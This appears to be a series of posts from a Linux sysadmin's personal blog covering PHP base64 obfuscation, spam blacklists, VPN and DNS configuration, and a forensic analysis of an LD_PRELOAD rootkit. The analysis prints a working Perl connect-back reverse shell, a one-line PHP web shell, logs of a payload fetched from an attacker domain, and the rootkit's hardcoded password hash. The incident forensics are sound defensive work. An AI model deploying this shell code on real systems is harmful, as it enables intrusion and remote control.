Into.the.Void.

A friend’s site was recently hit by the massive infections/hacks on Dreamhost’s servers, so I decided to do some scanning on some servers that I administrate for base64_decode references.

The simple command I used to find suspect files was:
# find . -name \*.php -exec grep -l "eval(base64_decode" {} \;

The results could be sorted in just 2 categories. Malware and stupidity. There was no base64_decode reference that did something useful in any possible way.

The best malware I found was a slightly modified version of the c99 php shell on a hacked joomla installation (the site has been hacked multiple times but the client insists on just re-installing the same joomla installation over and over and always wonders how the hell do they find him and hack him…oh well). c99 is impressive though…excellent work. I won’t post the c99 shell here…google it, you can even find infected sites running it and you can “play” with them if you like…

And now comes the good part, stupidity.
My favorite php code containing a base64_decode reference that I found:

$hash  = 'aW5jbHVkZSgnLi4vLi';
$hash .= '4vaW5jX2NvbmYvY29u';
$hash .= 'Zi5pbmMucGhwJyk7aW';
$hash .= '5jbHVkZSgnLi4vLi4v';
$hash .= 'aW5jX2xpYi9kZWZhdW';
$hash .= 'x0LmluYy5waHAnKTtl';
$hash .= 'Y2hvICRwaHB3Y21zWy';
$hash .= 'd2ZXJzaW9uJ107';
eval(base64_decode($hash));

Let’s see what this little diamond does:

% base64 -d 
aW5jbHVkZSgnLi4vLi4vaW5jX2NvbmYvY29uZi5pbmMucGhwJyk7aW5jbHVkZSgnLi4vLi4vaW5jX2xpYi9kZWZhdWx0LmluYy5waHAnKTtlY2hvICRwaHB3Y21zWyd2ZXJzaW9uJ107
include('../../inc_conf/conf.inc.php');include('../../inc_lib/default.inc.php');echo $phpwcms['version'];

So this guy used a series of strings which all of them together create a base64 encoded string in order to prevent someone from changing the version tag of his software. That’s not software, that’s crapware. Hiding the code where the version string appears ? That’s how you protect your software ? COME OOOOON….

Filed by kargig at 01:36 under Internet, Linux, Privacy
Tags: base64_decode, crapware, hack, joomla, Linux, malware, php
No Comments | 684 views

GrRBL
In the beginning of the year I announced my RBL for Greek spam emails. The blacklist is growing larger by the day, thanks to some really kind people forwarding me their Greek spam emails, and has reached more than 120 IP addresses of verified Greek spammers.This alone though is not enough.

Why
Some spammers use their aDSL lines which have dynamic IPs to send their massive email “newsletters”. These people are split into 2 sub-categories. The ones that use their own PC as an SMTP server and the ones who use their ISP’s mail server as SMTP. I’ve tried to complain to some of their ISPs…some replied back saying that they were willing to look into the issue (but did nothing at all in the end) and others did not even reply to me. For both sub-categories, GrRBL is ineffective since I can’t add dynamic IPs in the blacklist nor can I add the IPs of the email servers of those major Greek ISPs.

Another category of spammers is the one that uses their gmail/yahoo accounts to send their emails. GrRBL is ineffective for this category as well since I can’t add gmail/yahoo to the blacklist…

What
So there was no alternative but to gather all those email addresses of these 2 categories above and add them to a new blacklist, one that will contain email addresses. I use this blacklist with my spamassassin configuration to eliminate Greek spam that GrRBL can’t. Each time I receive (or someone forwards me) a new Greek spam, I add the “From:” email address to this new blacklist. This new blacklist grows far more aggressively than GrRBL since it’s a lot easier to gather the data and already has more than 140 addresses.

Distribution
There are two available formats of the blacklist, one ready for use by spamassassin and another one with clear formatting ready to be used even by SMTPs to drop these spam emails without even touching your inbox.
The blacklist is currently only distributed to a group of well trusted people and it is available only through rsync with a username/password.

I don’t want to make the list completely public yet, but if you are interested you can request it at the contact email of GrRBL and I will reply to you about accessing it.

Sidenote
If you need a good tool to check a host again some RBLs, adnsrblcheck by Yiorgos Adamopoulos is the way to go (and it includes GrRBL!)

Filed by kargig at 23:15 under Linux, Networking
Tags: blacklist, email, Greek, greek spam, grrbl, Internet, Linux, Networking, spam, spamassassin
3 Comments | 2,116 views

I have an OpenVPN server that has the push "redirect-gateway" directive. This directive changes the default gateway of the client to be the OpenVPN server, what I wanted though was to connect to the VPN and access only a specific subnet (eg. 100.200.100.0/24) through it without changing the server config (other people use it as a default gateway).

In the client config I removed the client directive and replaced it with these commands:
tls-client
ifconfig 172.18.0.6 172.18.0.5
route 172.18.0.0 255.255.255.0
route 100.200.100.0 255.255.255.0

What the previous lines do:
tls-client: Acts as a client! (“client” is an alias for “tls-client” + “pull” … but I don’t like what the pull did–>it changed my default route)
ifconfig 172.18.0.6 172.18.0.5: The tun0 interface will have ip 172.18.0.6 on our side and 17.18.0.5 on the server side. The IPs are not random, they are the ones OpenVPN used to assign to me while I was using the “client” directive.
route 172.18.0.0 255.255.255.0: Route all packets to 172.18.0.0 on the tun0 interface. In order to access services running on the OpenVPN server (172.18.0.1) I needed a route to them.
route 100.200.100.0 255.255.255.0: Route all packets to 100.200.100.0 on the tun0 interface

A traceroute to 100.200.100.1 now shows that I accessing that subnet through the vpn.

Filed by kargig at 11:25 under Linux, Networking, Privacy
Tags: client, Linux, Networking, openvpn, Privacy, route, server, vpn
4 Comments | 1,181 views

If you have adblock enabled and you try to visit any url of www.archivum.info you will get a really nasty alert saying:

You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit www.archivum.info.

When I first saw this I laughed…and then I tried to find a way to bypass it.
I used curl to see the sites html code:

$ curl -v www.archivum.info
curl -v www.archivum.info 
* About to connect() to www.archivum.info port 80 (#0)
*   Trying 69.147.224.162... connected
* Connected to www.archivum.info (69.147.224.162) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.19.5 (i486-pc-linux-gnu) libcurl/7.19.5 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15 libssh2/1.2
> Host: www.archivum.info
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 17 Nov 2009 11:24:22 GMT
< Server: Apache
< Last-Modified: Mon, 16 Nov 2009 08:41:17 GMT
< Accept-Ranges: bytes
< Content-Length: 9392
< Vary: Accept-Encoding
< Content-Type: text/html
< 
<html>
<head>
<title>archivum.info - The Internet archive.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">var disabled = false;</script><script type="text/javascript" src="http://www.archivum.info/js/adblocker_probe.js?
site=http://googlead.foobar.tld/"></script><script type="text/javascript">if (disabled == false) { location.replace("http://www.archivum.info/denied");
alert("You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising
for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit
www.archivum.info.");}</script></head>

[snip]

Here’s how this site blocks Adblockplus: there’s a variable called disabled set to “false” then if a js (http://www.archivum.info/js/adblocker_probe.js) runs it sets disabled to “true” . The hint is that adblockplus blocks urls starting with “googlead.” so it won’t visit “http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/” and the variable will remain “false“. Then the alert pops up.

The solution is very simple, just add an exception to your local AdblockPlus rules, AdblockPlus Preferences -> Add Filter:
@@|http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/

So firefox, visits the js url, disabled becomes “true” you are allowed to continue browsing the site and AdblockPlus continues blocking all blockable items.

Filed by kargig at 14:14 under Internet, Linux
Tags: adblock, adblockplus, alert, archivum.info, block ads, curl, firefox, javascript, Linux
No Comments | 1,132 views

For those who read my previous post, “Epic fail from a hosting company involving bad customer support and a critical security issue”
During the week some manager of the hosting company contacted the guy renting the servers and offered a free RAM upgrade for one server and a 60% monthly discount for 2 of the servers.

Not bad at all regarding the owner of the servers, but still I have many security related concerns about the hosting company

Filed by kargig at 23:55 under Linux
Tags: hosting, Linux, security
2 Comments | 1,774 views

That’s why I love ossec:

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/album_mod/..  /.../.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/lang_english/     /... /.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/     /... /.log'.

 --END OF NOTIFICATION

Just found this by copying some files for a client from his previous hosting company to one of the hosting servers of a company I work for.

There were actually 2 different sets of files.
The first one contained a tool that “hides” a process, called: “XH (XHide) process faker”, and the second one contained an iroffer executable.

Files:
i)xh-files.tar.gz
Listing:
.log/
.log/.crond/
.log/.crond/xh
.log/week~
.log/week

ii)iroffer-files.tar.gz
Listing:
.--/
.--/imd.pid
.--/imd.state.tmp
.--/imd.state
.--/linux

Mind the . (dot) of the directories containing the files.

Filed by kargig at 22:01 under Linux
Tags: iroffer, Linux, ossec, process hider, rootkit, security, vulnerability
2 Comments | 1,729 views

To cut the story as short as possible let’s say that someone rents some dedicated servers somewhere in a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed, then the hosting company did a huge mistake, I notified them about it and then they did another even bigger mistake (security issue) on the next day, October 2nd. I re-notified them about it…
So you can either read the whole story or if you are only interested on the security issue, skip the first day and go straight to October 2nd.

Some details, the server had 2 disks, sda with the OS (Debian 4.0) with Plesk control panel and sdb which had some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting’s company control panel.
10:15 I contacted the company’s support by email and notified them of the problem.
(more…)

Filed by kargig at 13:29 under Linux
Tags: compromise, customer support, debian, fail, hard disk, Linux, lsattr, password, plesk, rootkit, security, shv4, shv5, trojan, ttyload, ttymon, vulnerability
6 Comments | 3,413 views

Lately I somehow bumped on the manpage of resolv.conf. While reading it I saw the following really nice option:

rotate               sets  RES_ROTATE  in _res.options, which causes round robin selection of name‐
                     servers from among those listed.  This has the effect of spreading  the  query
                     load  among  all  listed servers, rather than having all clients try the first
                     listed server first every time.

Since then my /etc/resolv.conf on both Gentoo and Debian looks like that:
nameserver 194.177.210.10
nameserver 194.177.210.210
nameserver 194.177.210.211
options rotate


(I prefer using GrNET’s DNS servers than any others in Greece, especially for my laptop configuration. Since they allow recursion I can use them to avoid lousy DNS services provided by lousy DSL routers regardless of the ISP I am currently using, when I am “mobile” with my laptop.)

While using the following config I issued a ping command on a teminal and a tcpdump command on another to see what was actually happening. The result looked like this:
root@lola:~# tcpdump -ni eth1 port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
11:20:50.494537 IP 192.168.1.65.52525 > 194.177.210.10.53: 3415+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:50.534145 IP 194.177.210.10.53 > 192.168.1.65.52525: 3415 1/7/6 (357)
11:20:51.494552 IP 192.168.1.65.40400 > 194.177.210.210.53: 4504+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:51.534205 IP 194.177.210.210.53 > 192.168.1.65.40400: 4504 1/3/6 (271)
11:20:52.494554 IP 192.168.1.65.42385 > 194.177.210.211.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.544197 IP 194.177.210.211.53 > 192.168.1.65.42385: 48450 ServFail 0/0/0 (46)
11:20:52.544409 IP 192.168.1.65.43773 > 194.177.210.10.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.584232 IP 194.177.210.10.53 > 192.168.1.65.43773: 48450 1/7/6 (357)


People who are used to reading tcpdump output will immediately point out the ServFail entries of the log. Server 194.177.210.211 refused to provide proper results for the PTR query of 210.222.102.147.in-addr.arpa.

Further investigation of the problem:

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.210
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 66841 IN  PTR achilles.noc.ntua.gr.

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.211
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.10
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 86115 IN  PTR achilles.noc.ntua.gr.

It was obvious that 2 out of 3 DNS servers responded as they should and the other did not.

What I did was to notify a friend working as an administrator there (GrNET) and let him know of the problem. After some investigation, he later on told me that the problem was related to dnssec issues. Possibly a configuration error on RIPE’s side. As far as I know they had to temporarily disable dnssec on the 147.102 zone…I am not aware whether they fixed the problem (using dnssec) yet though.

I am really glad they acted as fast as possible regarding the solution of the problem

Filed by kargig at 21:31 under Linux
Tags: debian, dns, dnssec, Gentoo, grnet, Linux, resolv.conf, rotate
3 Comments | 2,877 views

I’ve been trying uzbl for the last few days and I am pretty much impressed on how useful such a small application can be in certain usage cases!

I installed it on my Debian testing using the following blog post: Installing uzbl on Debian Squeeze .
Be sure to make install else you’ll have no config and uzbl will be unusable!!!

The first place I used it was for the urlLauncher plugin of urxvt. On my .Xdefaults I have the following piece of code:
urxvt.perl-ext-common: default,matcher,-option-popup,-selection-popup,-realine
urxvt.matcher.button: 1
urxvt.urlLauncher: /usr/local/bin/urxvt-url.sh

and my /usr/local/bin/urxvt-url.sh contains:
#!/bin/sh
uzbl "$1"

Now every url on the console get’s highlighted and I can open it with uzbl. And that means opening really fast!

Example:
urxvt terminal (tabbed by fluxbox) with some urls highlighted by the perl matcher plugin of urxvt:

left clicking on one of the urls opens it with uzbl:

Apart from that, I’ve started using uzbl to open links on instant messengers, IRC clients and in every other place that people send me simple links to check out or I need a fast browser instance. Some people might say that it looks like links2 graphical mode, but it’s NOT like opening urls with “links -G” because uzbl is based on webkit and that means it can deal with javascript, java, flash, whatever…

I just love the way you can keybind all the actions you want on it…on the example config that comes with it, you quit the browser by typing ZZ…how great is that ?

Some usage tips
1) Tabbed behavior (if you have fluxbox):
In ~/.config/uzbl/config add
bind t _ = spawn uzbl --uri %s
and in ~/.fluxbox/apps add the [group] tag before the [app] tag for uzbl like that:

[group]
 [app] (name=uzbl) (class=Uzbl)
  [Workspace]   {0} 
  [Head]    {0} 
  [Dimensions]  {800 1284}
  [Position]    (UPPERLEFT) {0 0}
  [Maximized]   {yes}
  [Jump]    {yes}
  [Close]   {yes}
[end]

Now the command t www.google.com inside uzbl, will open a new tabbed window of uzbl with www.google.com loaded in it.

2) Close uzbl window with ctrl+w
In ~/.config/uzbl/config add:

bind     ctrl+v ctrl+w    = exit

(press ctrl+v ctrl+w one after the other and you will get something like ^W in the file)

P.S. If you are a person that just came from the point and click windows world to the beautiful world of linux, or you are a person that loves bloated desktop managers like KDE/gnome/etc or bloated applications like firefox/iceweasel/konqueror don’t even think of installing it. You’ll never understand its value…
P.S.2. If Richard Stallman decided to browse the web and had an internet connection uzbl would probably be his browser of choice

Filed by kargig at 17:15 under Linux
Tags: browser, debian, firefox, fluxbox, iceweasel, lightweight, Linux, terminal, urxvt, uzbl
6 Comments | 3,049 views

Fast howto (mostly a note for personal use) on what’s needed on Debian to use an encrypted loop:

1. The necessary utilities (patched losetup)
# aptitude install loop-aes-utils
2. The necessary kernel-module
# aptitude install loop-aes-modules-2.6.30-1-686-bigmem
3. Create the keyfile (keep your computer as busy as possible while doing this to increase entropy)
# head -c 2925 /dev/urandom | uuencode -m - | head -n 66 | tail -n 65| gpg --symmetric -a >/path/to/keyfile.gpg
4. Loopfile creation (10Mb)
# dd if=/dev/urandom of=/my-encrypted-loop.aes bs=1k count=10000
5. Initialize loopfile
# losetup -K /path/to/keyfile.gpg -e AES256 /dev/loop5 /home/username/crypto-loop.img
6. Format loopfile
# mke2fs /dev/loop5
7. Delete loop device
# losetup -d /dev/loop5
8. Create mount point for loopfile
# mkdir /mnt/crypto-loop
9. Add entry to fstab

/home/username/crypto-loop.img /mnt/crypt-loop ext2 defaults,noauto,user,loop=/dev/loop7,encryption=AES256,gpgkey=/path/to/keyfile.gpg 0 0

10. Try mounting the loopfile as user
$ mount /mnt/crypto-loop
11. Check it’s mounted properly
$ mount | grep -i aes

and use it!

P.S. Secure your keyfile.gpg, if it gets lost you won’t _ever_ be able to decrypt what was inside crypto-loop.img!

Filed by kargig at 20:59 under Encryption, Linux
Tags: aes, debian, Encryption, gpg, Linux, loop, loop-aes
4 Comments | 8,868 views

Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:
- On machine XXX mysqld is not starting since Saturday.
- Can I drink my coffee and come over later to check it ? Is it critical ?
- Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ld-linuxv.so.1 comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I run strings to it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry; the path of where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:
crypt
readdir64
__xstat64
__l xstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

–01:05:38– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:05:51– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695]

–01:17:14– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:17:26– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print “[*] Dumping Arguments\n”;

$host = “A.B.C.D”;
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
}
print “[*] Connecting…\n”; $proto = getprotobyname(‘tcp’) || die(“[-] Unknown Protocol\n”);

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (“[-] Socket Error\n”);

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4×8″, 2, $port, $target)) {
die(“[-] Unable to Connect\n”);
}
print “[*] Spawning Shell\n”;

if (!fork( )) {
open(STDIN,”>&SERVER”);
open(STDOUT,”>&SERVER”);
open(STDERR,”>&SERVER”);
exec {‘/bin/sh’} ‘-bash’ . “\0″ x 4;
exit(0);
}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D – - [15/Aug/2009:01:05:33 +0300] “GET http://www.domain.com/admin/ HTTP/1.1″ 302 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1″ 200 303 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 131 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:38 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:47 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 52 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:50 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:51 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1″ 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled ld-linuxv.so.1 and he created /etc/ld.so.preload. Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

Filed by kargig at 14:59 under Linux
Tags: apache2, audit, debian, etch, exploit, ld-linuxv, ld-linuxv.so.1, Linux, perl, record_company, rootkit, security, trojan, vulnerability, zen-cart, zencart
34 Comments | 19,242 views

Lately I noticed some image distortion appearing on some websites using my laptop with Debian squeeze. Menus on swiftfox did not appear as they should, some logos appeared out of their place and there were artifacts and other annoying things. For example Planet Gnome looked like this:

